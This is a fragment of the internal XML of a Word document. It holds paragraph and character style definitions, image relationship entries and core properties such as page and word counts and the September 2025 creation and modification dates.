    <w:rsid w:val="006B2487"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008D04B8"/>
    <w:rsid w:val="00FB6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66344"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5AB3B74B-47AE-4CEC-91F5-1286D14E9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4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24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24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24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24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2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4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24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24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24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24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2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487"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="006B2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487"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="006B2487"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="006B2487"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="006B2487"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="006B24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2487"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="006B24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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.tmp"/><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image" Target="media/image13.tmp"/><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image" Target="media/image16.tmp"/><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tmp"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.tmp"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.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10</Pages>
  <Words>888</Words>
  <Characters>5066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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-26T05:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-26T05:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>